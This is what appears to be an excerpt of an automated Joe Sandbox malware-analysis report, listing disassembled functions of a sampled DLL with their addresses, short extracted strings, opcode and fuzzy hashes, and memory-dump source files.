Yara matches

Similarity

API ID:
String ID: [$R[+$Y$v@
API String ID: 0-1276245682
Opcode ID: efe08f301ab2b251a86e33dfee0dd2d26676926c88cc055a74a7a241cd428695
Instruction ID: b7c6c0e0ca8a7091c32249254ec12c61c76759bccf917ca827ebac1b0ddf97e2
Opcode Fuzzy Hash: efe08f301ab2b251a86e33dfee0dd2d26676926c88cc055a74a7a241cd428695
Instruction Fuzzy Hash: 19614372C00209EFCF08DFE0D94AAEEBBB5FB48304F208159E911B6260D7B55A55CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00D49A01, Relevance: 5.1, Strings: 4, Instructions: 140COMMON

Download Yara Rule

Strings

<o, xrefs: 00D49A4B
}0, xrefs: 00D49A6C
l@, xrefs: 00D49A34
<f~, xrefs: 00D49AC8

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: <f~$<o$l@$}0
API String ID: 0-758050912
Opcode ID: 81aabe2cacc40ca78a0a0bd0b7a3bfaf129779c12e0e85beb0b3127220a46710
Instruction ID: ede1ebd94ae940cb1187dbb9c1dfb415e362cd65a1119fe414e9922f5f16d613
Opcode Fuzzy Hash: 81aabe2cacc40ca78a0a0bd0b7a3bfaf129779c12e0e85beb0b3127220a46710
Instruction Fuzzy Hash: F2516571108340AFC744CF66D89942FBBE1EFC8368F54591DF99696260D3B1CA488F9A

Uniqueness

Uniqueness Score: -1.00%

Function 00D32194, Relevance: 5.1, Strings: 4, Instructions: 83COMMON

Download Yara Rule

Strings

#FZ, xrefs: 00D321DF
g#, xrefs: 00D321E6
^di_, xrefs: 00D32235
y^, xrefs: 00D3225F

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: #FZ$^di_$g#$y^
API String ID: 0-3614166594
Opcode ID: 898530e46850b57c1b6fa34e43e5d7b9a10138e0edf0e53e97a2ce7a6b0f25a3
Instruction ID: 18c9f1c2ca3921d90cd4902b5294a3be08d5ae9db3a3a4f8e2c0b506193216ff
Opcode Fuzzy Hash: 898530e46850b57c1b6fa34e43e5d7b9a10138e0edf0e53e97a2ce7a6b0f25a3
Instruction Fuzzy Hash: AF31F372800208FBCF05DFA5DC098DEBFB6FF89304F508159FA10A6120D3B68A60AF90

Uniqueness

Uniqueness Score: -1.00%

Function 00D48FAE, Relevance: 4.1, Strings: 3, Instructions: 312COMMON

Download Yara Rule

Strings

zPB, xrefs: 00D4926B
tU, xrefs: 00D4922D
<S, xrefs: 00D491CE

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: <S$tU$zPB
API String ID: 0-3909742637
Opcode ID: 20485632ce87518b22678c02ce7e6d5d4dad39b3afe56a200c29dd119bf08fad
Instruction ID: 454f4d26579c79499bcdcf00cb404f21086d0b728ed20d2beff8d35e78d1a6ba
Opcode Fuzzy Hash: 20485632ce87518b22678c02ce7e6d5d4dad39b3afe56a200c29dd119bf08fad
Instruction Fuzzy Hash: 53F1FD715083809FD368CF21C58AA4BFBF2FBC5758F50891DE6AA96260D7B18909CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00D49DF5, Relevance: 4.0, Strings: 3, Instructions: 223COMMON

Download Yara Rule

Strings

K3, xrefs: 00D49E4A
%;, xrefs: 00D49F0A
", xrefs: 00D49FAE

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: "$%;$K3
API String ID: 0-3594330084
Opcode ID: f7044b5173f9d2a29f25416d3282c1d5a6daf1c4eab99132a200a181acee52d3
Instruction ID: 2e7ee2d15172fd35093b0953bc4ce56e114bc1abfb28c060288865fc00e59b1b
Opcode Fuzzy Hash: f7044b5173f9d2a29f25416d3282c1d5a6daf1c4eab99132a200a181acee52d3
Instruction Fuzzy Hash: BAA161725083809FD358DF6AC989A5BBBE2FBC4758F40891DF1869A220D3B58949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00D3A445, Relevance: 4.0, Strings: 3, Instructions: 213COMMON

Download Yara Rule

Strings

kb, xrefs: 00D3A5BE
), xrefs: 00D3A51E
B:o, xrefs: 00D3A602

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: )$B:o$kb
API String ID: 0-1085388577
Opcode ID: 6a7416e707ce5b5be4caa493017c2dded001c85c0994b7965ad07e3c46f5a48f
Instruction ID: 2e966b0846a8e515dd3390980bef61180c3246e1ff293029697e0d034c9eefd6
Opcode Fuzzy Hash: 6a7416e707ce5b5be4caa493017c2dded001c85c0994b7965ad07e3c46f5a48f
Instruction Fuzzy Hash: 24A120B15083419FC398CF69C98A41BBBF1FBC4758F109A2DF59696260D3B18A09CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00D4BEFD, Relevance: 4.0, Strings: 3, Instructions: 201COMMON

Download Yara Rule

Strings

', xrefs: 00D4C145
8~", xrefs: 00D4BF5F
$w%, xrefs: 00D4C027

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: '$8~"$$w%
API String ID: 1586166983-1780403920
Opcode ID: d95c276b6b2387f37da7632b621b9b1d523fb324f993845ec19253968e6159f3
Instruction ID: 6f98f16ec1d64d8b158f62d8a2f253ac018e99f882b7137744a4ca88057ba640
Opcode Fuzzy Hash: d95c276b6b2387f37da7632b621b9b1d523fb324f993845ec19253968e6159f3
Instruction Fuzzy Hash: ADA11071D0130AEBDF18CFE5D98A9DEBBB2FB44314F208119E511BA264D7B41A5ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 00D4D8DB, Relevance: 3.9, Strings: 3, Instructions: 157COMMON

Download Yara Rule

Strings

(2, xrefs: 00D4DA8A
)-, xrefs: 00D4DA04
m~`, xrefs: 00D4D991

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: )-$(2$m~`
API String ID: 0-2018184401
Opcode ID: 3e11803ea927e7df6680295804b9090ad11ac98bc0e337558a280692f26d1627
Instruction ID: c78748d8a60fbdf727b47c328d72be012d9d5885c90145d0848d2be702185992
Opcode Fuzzy Hash: 3e11803ea927e7df6680295804b9090ad11ac98bc0e337558a280692f26d1627
Instruction Fuzzy Hash: C37157B24083419FC354DF25D58545BBBF1FBD8358F144A1DF59596220E3B1DA098FA3

Uniqueness

Uniqueness Score: -1.00%

Function 00D49774, Relevance: 3.9, Strings: 3, Instructions: 149COMMON

Download Yara Rule

Strings

F7, xrefs: 00D497C3
E, xrefs: 00D497FD
1C4, xrefs: 00D498EC

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1C4$F7$E
API String ID: 0-3303878784
Opcode ID: ec422184f0bc8e42d70ac5f52bb51cad38797440f210b574c256831cfc5cf489
Instruction ID: 78fbfdfb6e41c751195837ec33a950b01f2adc1439138b33506278d727d455f5
Opcode Fuzzy Hash: ec422184f0bc8e42d70ac5f52bb51cad38797440f210b574c256831cfc5cf489
Instruction Fuzzy Hash: A75142B2109381AFC758CF26D98981FFAE5FBD4748F406A1DF19696260D370CA09CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00D3B820, Relevance: 3.9, Strings: 3, Instructions: 145COMMON

Download Yara Rule

Strings

$P, xrefs: 00D3B83F
Ei, xrefs: 00D3B835
v-, xrefs: 00D3BA01

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$Ei$v-
API String ID: 0-1888193988
Opcode ID: 73a137e48d26ab6449b358ced16967e1c46be28fdc68a4d872142666c00f4118
Instruction ID: 6c17d13ae493571311a1087c7e329c15be1fa999f4ec3739375a942b2d352b6e
Opcode Fuzzy Hash: 73a137e48d26ab6449b358ced16967e1c46be28fdc68a4d872142666c00f4118
Instruction Fuzzy Hash: F46133B15083809FD394CF25D48980BBBF1FBC8728F508A1DF19656260D7B5DA0ACF56

Uniqueness

Uniqueness Score: -1.00%

Function 00D507AA, Relevance: 3.9, Strings: 3, Instructions: 145COMMON

Download Yara Rule

Strings

jv~, xrefs: 00D5092E
n~, xrefs: 00D50906
5b, xrefs: 00D508B8

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 5b$jv~$n~
API String ID: 0-1119068381
Opcode ID: 6585e598b54eef6655fc481e2fa89fc45647e5ba168c8799dc9d2bcfbe027364
Instruction ID: 560835d71d5bfe3f19038812f427549ba077788379bd5fd6138ee022c4764315
Opcode Fuzzy Hash: 6585e598b54eef6655fc481e2fa89fc45647e5ba168c8799dc9d2bcfbe027364
Instruction Fuzzy Hash: C75155724083059FC748CF21C98981FBBE1FBC8758F548A1DF596A6224D371CA89CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00D47A0F, Relevance: 3.9, Strings: 3, Instructions: 137COMMON

Download Yara Rule

Strings

-,, xrefs: 00D47A4F
<, xrefs: 00D47B6B
Dy~, xrefs: 00D47B8E

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: -,$<$Dy~
API String ID: 0-1106285139
Opcode ID: 2f72d444c97b3a633e9ee1e23f3c4efe55d78dac50d0b737e1d6682dd7838195
Instruction ID: 26de247aa81d7444dd6b7ecbd0e5bf0c1612480be73117887e5ccdeba4aaa981
Opcode Fuzzy Hash: 2f72d444c97b3a633e9ee1e23f3c4efe55d78dac50d0b737e1d6682dd7838195
Instruction Fuzzy Hash: 5A61DF71D0120DEBDF08CFE5E98A9DEBBB2FB48314F208159E111B6260D7B54A55CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00D37442, Relevance: 3.9, Strings: 3, Instructions: 116COMMON

Download Yara Rule

Strings

K3xq, xrefs: 00D37446
F, xrefs: 00D374EB
k_, xrefs: 00D3751B

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: F$K3xq$k_
API String ID: 0-3174058581
Opcode ID: 71d5252ac2750496c415a6123662032438c0c807af6838b650976cd3071caf65
Instruction ID: 9fdf8eaedab472cf3e28297b375d12f2f9d95cbba640c6d5a1c18052a82d421d
Opcode Fuzzy Hash: 71d5252ac2750496c415a6123662032438c0c807af6838b650976cd3071caf65
Instruction Fuzzy Hash: 3541ACB160C7429FC768DF24D48592FBBE1FBC8758F140A1EF58696261D770CA088BA7

Uniqueness

Uniqueness Score: -1.00%

Function 00D4A2A5, Relevance: 3.9, Strings: 3, Instructions: 105COMMON

Download Yara Rule

Strings

7, xrefs: 00D4A2C0
l7u, xrefs: 00D4A2F6
=l, xrefs: 00D4A35F

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: =l$l7u$7
API String ID: 0-2380881030
Opcode ID: c23fe4a8feb5c59c2ecde09cf087a019517c4274363f13ea15d3950ca3f21047
Instruction ID: 4588b654c6e3f7fe3e04edc36ea8dc28140900c0c2ef6f1c9aa88cf3400656f8
Opcode Fuzzy Hash: c23fe4a8feb5c59c2ecde09cf087a019517c4274363f13ea15d3950ca3f21047
Instruction Fuzzy Hash: 7F512171D0021AEBDF44CFE5D98A5EEBBB1FF44318F208158E912B2220D7B44A59CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00D3BAA9, Relevance: 3.8, Strings: 3, Instructions: 89COMMON

Download Yara Rule

Strings

c/c, xrefs: 00D3BAE9
zm, xrefs: 00D3BACF
k9j, xrefs: 00D3BBBA

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: c/c$k9j$zm
API String ID: 0-1793526708
Opcode ID: d43419449e52b5cbd41cd5db91105e5f334013690b7b8493d0933a13370cd3ef
Instruction ID: acfa2157e5efec926fab4c0f101157e8be6f490bea1bb6034abf2a1a8147850c
Opcode Fuzzy Hash: d43419449e52b5cbd41cd5db91105e5f334013690b7b8493d0933a13370cd3ef
Instruction Fuzzy Hash: F0410372D0030AABCB04DFA5D84A5EEBBB2FF44314F108558E521A6260D7B49B54CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00D4AD08, Relevance: 2.7, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

r+, xrefs: 00D4AF9B
&b, xrefs: 00D4AE84

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: &b$r+
API String ID: 0-3016113347
Opcode ID: e2275ca919ffbfd9d4409a84f75b2d027b467260e26fad471461965f912f85e7
Instruction ID: 4dd0fde5617865626f886cb001c1f67fcdea2b0598d731fe0ca6ee96832721fd
Opcode Fuzzy Hash: e2275ca919ffbfd9d4409a84f75b2d027b467260e26fad471461965f912f85e7
Instruction Fuzzy Hash: BDC132B15093409FC3A8CF66C98A40BBBE1FBD4758F108A2DF69686260C7B5C949CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00D44F74, Relevance: 2.7, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

X\2, xrefs: 00D45164
E, xrefs: 00D451FD

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: E$X\2
API String ID: 0-703089088
Opcode ID: 78c3cb9ccc69772effb1ff3047f9fcb6948b68c99bc297c815027d4858eb78e3
Instruction ID: 356d10651613a3d3a031267e3b1603a8920c6252265a11fbce4e40fba94f486e
Opcode Fuzzy Hash: 78c3cb9ccc69772effb1ff3047f9fcb6948b68c99bc297c815027d4858eb78e3
Instruction Fuzzy Hash: DA9132711083809FC368CF25D88A51BBBE1FBC5398F544A1DF29696260D3B1CA49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 00D3DE74, Relevance: 2.7, Strings: 2, Instructions: 193COMMON

Download Yara Rule

Strings

g>~, xrefs: 00D3DFAD
}#J, xrefs: 00D3DF70

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: g>~$}#J
API String ID: 0-4030106083
Opcode ID: 0ad4e5b6b4c4752021528dc0ad53a169e372c358331fc1ab2a0f9852c5ce9d86
Instruction ID: a0891ab12896cea72f855cf79439f5f611a2879f358b513d923b57c718574d1d
Opcode Fuzzy Hash: 0ad4e5b6b4c4752021528dc0ad53a169e372c358331fc1ab2a0f9852c5ce9d86
Instruction Fuzzy Hash: 009144728083418FC758CF65C48641BFBE1FB94358F554A2EF8DA962A0C3B5DA09CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00D3E7DE, Relevance: 2.7, Strings: 2, Instructions: 191COMMON

Download Yara Rule

Strings

-br, xrefs: 00D3E98E
F.<`, xrefs: 00D3E90E

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: -br$F.<`
API String ID: 0-3678315648
Opcode ID: eaec14a4876c9c72c20777f37d81c5f73ce4be34e10a3d9202af31a534b2139e
Instruction ID: 2f341b537e228ccc594bdd053825116816f91cf336996513f894037a0c63276c
Opcode Fuzzy Hash: eaec14a4876c9c72c20777f37d81c5f73ce4be34e10a3d9202af31a534b2139e
Instruction Fuzzy Hash: 0A9122715083819FC358CF65D98991BBBE1FBD4748F10891DF686962A0D3B1DA48CFA3

Uniqueness

Uniqueness Score: -1.00%

Function 00D4654A, Relevance: 2.7, Strings: 2, Instructions: 157COMMON

Download Yara Rule

Strings

#V, xrefs: 00D46594
=l,, xrefs: 00D466AA

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: =l,$#V
API String ID: 0-882995766
Opcode ID: 63d82414185dada1c286f70f67569fe37ebaaf7d58e8b6f899c28194972c03bf
Instruction ID: ccff57a9c51550dea14fd7bbbfa349f9d48664495db265c444158b1d5798c538
Opcode Fuzzy Hash: 63d82414185dada1c286f70f67569fe37ebaaf7d58e8b6f899c28194972c03bf
Instruction Fuzzy Hash: E381F0B1D0120DEBCF08CFA0D98A9EEBBB5FF44308F208159E515B6260D7B45A49CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00D407F4, Relevance: 2.6, Strings: 2, Instructions: 113COMMON

Download Yara Rule

Strings

a9, xrefs: 00D4083D
W^)i, xrefs: 00D408EE

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: W^)i$a9
API String ID: 0-1728637351
Opcode ID: 9ccdc5349b28720e7f0e41b52d25bb7abf09be7a25faa8edea07dbda9169424f
Instruction ID: 1fb466c6b12df8ddc639bcf756c23ad51efbaeb0788385a04a1abe039a885731
Opcode Fuzzy Hash: 9ccdc5349b28720e7f0e41b52d25bb7abf09be7a25faa8edea07dbda9169424f
Instruction Fuzzy Hash: 56417771508341CBDB14CF20D58581FFBE1BBC4358F184A1EF6D966261D370DA498F96

Uniqueness

Uniqueness Score: -1.00%

Function 00D45333, Relevance: 2.6, Strings: 2, Instructions: 107COMMON

Download Yara Rule

Strings

`0, xrefs: 00D453F8
j0, xrefs: 00D45355

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: `0$j0
API String ID: 0-1706687062
Opcode ID: a698ae834057bf3177c30c95693b9f296898de2c2be967a0d04c9a146b8b5e9c
Instruction ID: 099546588878c676e0112060a323c7c5e4419f52dd5697a074dcf4abe73f6ce6
Opcode Fuzzy Hash: a698ae834057bf3177c30c95693b9f296898de2c2be967a0d04c9a146b8b5e9c
Instruction Fuzzy Hash: C84156724083019FC344DF21A98944FBBE1BBD8758F154A2DF8A966261C3718A59CFA7

Uniqueness

Uniqueness Score: -1.00%

Function 00D37E79, Relevance: 2.6, Strings: 2, Instructions: 104COMMON

Download Yara Rule

Strings

~z#, xrefs: 00D37F30
bg, xrefs: 00D37ECC

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: bg$~z#
API String ID: 0-3633068236
Opcode ID: d27443a6954f6df962cc2ff153474a91a954d70af200d7c111dd209c5580846d
Instruction ID: 826afbadb6cd0a88a6b5ddf851a5b4a235803a656a9bed209331bb080351f143
Opcode Fuzzy Hash: d27443a6954f6df962cc2ff153474a91a954d70af200d7c111dd209c5580846d
Instruction Fuzzy Hash: AE414276C0061EDBDF58CEA0C84A5EEBBB1BF54318F248199D451B6260C7B80B4ACFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D45515, Relevance: 2.6, Strings: 2, Instructions: 92COMMON

Download Yara Rule

Strings

bWr, xrefs: 00D4551E
(8r, xrefs: 00D45578

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: bWr$(8r
API String ID: 0-4034592896
Opcode ID: 6bd561600b29e8d40b53efd76a24b6e4d1b51c40b914b8d5291e690eb23a4ca9
Instruction ID: a9517ea8d82ec23bd74f0dd120db30bc6900b9febd215890798426449c01951a
Opcode Fuzzy Hash: 6bd561600b29e8d40b53efd76a24b6e4d1b51c40b914b8d5291e690eb23a4ca9
Instruction Fuzzy Hash: 6D411471C00219EFCF18DFA4D98A9EEBBB5FB04304F20818AE511B6264D3B55B85CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00D4F840, Relevance: 1.5, Strings: 1, Instructions: 210COMMON

Download Yara Rule

Strings

!+s, xrefs: 00D4FA53

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: !+s
API String ID: 0-2041718826
Opcode ID: ecbfb722ef4a51468ccc6504c580edf44e6ea5507055d07fe96aabdae32b1462
Instruction ID: 509ab1713e0ce6d937b3664d669a2d1485016602c5ab180a1a55f16022edf805
Opcode Fuzzy Hash: ecbfb722ef4a51468ccc6504c580edf44e6ea5507055d07fe96aabdae32b1462
Instruction Fuzzy Hash: 31910E720083449FD758CF66C88991BFBE1FBC5B58F40892DF69686260D3B6C949CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00D50A64, Relevance: 1.4, Strings: 1, Instructions: 197COMMON

Download Yara Rule

Strings

i*_, xrefs: 00D50B14

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: i*_
API String ID: 0-4175851924
Opcode ID: 033916526ebd42fe384ae7de4cef2794808c9c5efeeb7d3c76fe8acba1a56522
Instruction ID: 3929e8bd8b280a79eb99996b8c6dbc2222288375d42f8eb3cfdbe9d530c3ae4e
Opcode Fuzzy Hash: 033916526ebd42fe384ae7de4cef2794808c9c5efeeb7d3c76fe8acba1a56522
Instruction Fuzzy Hash: A68151721083409FD754CE61D98992BBBF1EBC5B58F00891DF9929A260D3B6C909CF93

Uniqueness

Uniqueness Score: -1.00%

Function 00D4C5D5, Relevance: 1.4, Strings: 1, Instructions: 194COMMON

Download Yara Rule

Strings

<;M, xrefs: 00D4C6DD

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: <;M
API String ID: 0-164005337
Opcode ID: 69bc5a0c2629d2e7e2e113d8c4d6675f6c19ab6e61c56634021a7ea7df04c153
Instruction ID: 5ad3ac48b09c3d6eaf9551fd96b813f4ee50a2c7a6c0a8a8571168aaf218bba7
Opcode Fuzzy Hash: 69bc5a0c2629d2e7e2e113d8c4d6675f6c19ab6e61c56634021a7ea7df04c153
